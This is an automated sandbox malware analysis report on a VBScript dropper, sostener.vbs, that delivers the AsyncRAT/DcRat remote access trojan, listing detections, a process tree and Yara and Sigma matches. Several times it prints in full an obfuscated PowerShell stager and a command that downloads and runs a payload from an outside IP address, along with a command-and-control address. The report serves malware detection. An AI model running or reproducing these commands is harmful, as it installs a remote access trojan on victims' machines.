Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sostener.vbs

Overview

General Information

Sample name:sostener.vbs
Analysis ID:1523124
MD5:640864bd8dcc33f7191cea6e8794a386
SHA1:6b651ed9e576d72b6c53e975e555572701fe2681
SHA256:5b30c27eaca00c51aa594df7273f8e24d84d08a6c085147697e21b082e3e7812
Tags:user-lontze7
Infos:

Detection

AsyncRAT, DcRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
Yara detected DcRat
Yara detected Powershell download and execute
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5332 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3848 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4312 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • RegSvcs.exe (PID: 6884 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: AsyncRAT

{"Server": ")8\"zc", "Ports": "$A<IlE,84,7;&gV", "Version": "*wacp!]6l[e", "BDOS": "U^2", "AES_key": "R4OsSR16j3MjPEBlkfzyOGTLnlxVVuwW", "Mutex": "n#QO", "Certificate": "UDq5O^", "ServerSignature": "1", "Group": "Oy\\iql0S13XbS4sp1@PsWg:PGIw'~?Q;ifHa#3ef8L\"SpWzk,&&}s;$/?J9UH3>j3={V'nCn.PI*|e>4&k2[2Y\"w$T+^X_j9HSG[?b*'54eS5e_~(e#Z\"n,TX*T->_qfnrv]TM^:Sm1uBPI9|\\4a^^?R|av{V =9J2E|^{wS7Zq,=)a;uL uRaE\"K5bW ycl@NpcoGBww~DzGBkD+U1vws!$\"Awn}G}9cJ6;M^g4xsh'`s^(KX%.#m`^wc.Syd?~c\"Lsj>]?`qx7a!]~a7*CV\\/w6F+j0{&]M*&[7-]2Y</uTKz[gT&GM", "AntiProcess": "HB!<i[>IoEHueVuN1#fc!@?Z#TsdM.i5RX/xjjmOH +NC,v <85~NN!Z.)uebFY`", "PasteBin": "FLVl;"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapWindows_Trojan_DCRat_1aeea1acunknownunknown
  • 0x564a7:$b2: DcRat By qwqdanchun1

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.1707124383.000001851CFD0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
    00000003.00000002.1707124383.000001851CFD0000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_DLAgent09Detects known downloader agentditekSHen
    • 0x16fd:$h1: //:ptth
    • 0xfc1:$s1: DownloadString
    • 0xe27:$s2: StrReverse
    • 0xfb0:$s3: FromBase64String
    • 0x1237:$s4: WebClient
    00000004.00000002.2957234369.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
      00000004.00000002.2957234369.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_DCRat_1aeea1acunknownunknown
      • 0x63fb:$a1: havecamera
      • 0x98ec:$a2: timeout 3 > NUL
      • 0x990c:$a3: START "" "
      • 0x9797:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g
      • 0x984c:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
      00000004.00000002.2958714804.000000000148B000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_DCRat_1aeea1acunknownunknown
      • 0x1700:$b2: DcRat By qwqdanchun1
      • 0x7064:$b2: DcRat By qwqdanchun1
      Click to see the 14 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.powershell.exe.1851cfd0000.4.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        3.2.powershell.exe.1851cfd0000.4.raw.unpackMALWARE_Win_DLAgent09Detects known downloader agentditekSHen
        • 0x16fd:$h1: //:ptth
        • 0xfc1:$s1: DownloadString
        • 0xe27:$s2: StrReverse
        • 0xfb0:$s3: FromBase64String
        • 0x1237:$s4: WebClient
        4.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
          4.2.RegSvcs.exe.400000.0.unpackWindows_Trojan_DCRat_1aeea1acunknownunknown
          • 0x65fb:$a1: havecamera
          • 0x9aec:$a2: timeout 3 > NUL
          • 0x9b0c:$a3: START "" "
          • 0x9997:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g
          • 0x9a4c:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
          4.2.RegSvcs.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_B64_ArtifactsDetects executables embedding bas64-encoded APIs, command lines, registry keys, etc.ditekSHen
          • 0x9a4c:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA
          • 0x9997:$s2: L2Mgc2NodGFza3MgL2
          • 0x9916:$s3: QW1zaVNjYW5CdWZmZXI
          • 0x9964:$s4: VmlydHVhbFByb3RlY3Q
          Click to see the 16 entries

          Other

          SourceRuleDescriptionAuthorStrings
          amsi64_4312.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Base64 Encoded PowerShell Command Detected
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:
            Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadSt
            Sigma detected: Potentially Suspicious Malware Callback Communication
            Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 89.117.23.22, DestinationIsIpv6: false, DestinationPort: 4455, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 6884, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49737
            Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", ProcessId: 5332, ProcessName: wscript.exe
            Sigma detected: PowerShell Download Pattern
            Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadSt
            Sigma detected: PowerShell Web Download
